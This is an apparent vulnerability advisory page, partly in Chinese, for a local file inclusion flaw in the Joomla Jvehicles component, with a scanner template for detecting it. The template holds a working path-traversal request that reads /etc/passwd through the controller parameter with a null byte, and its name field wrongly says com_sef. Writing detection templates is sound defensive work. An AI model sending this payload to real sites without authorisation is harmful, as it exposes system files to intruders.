joomla-jvehicles-lfi: Joomla! Component com_sef - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla Jvehicles LFI | POC: 已公开

漏洞描述

A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.

PoC代码[已公开]

id: joomla-jvehicles-lfi

info:
  name: Joomla! Component com_sef - Local File Inclusion
  author: daffainfo
  severity: high
  description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11997
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: joomla,lfi,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402203a2849546305f15c6a6f869610581a1c9977e2ff4bac016dc791b0d9326f00960220760a311af7cafa132568c1325d5948ce1831f73257b48f561296921b7187dbf1:922c64590222798bb761d5b6d8e72950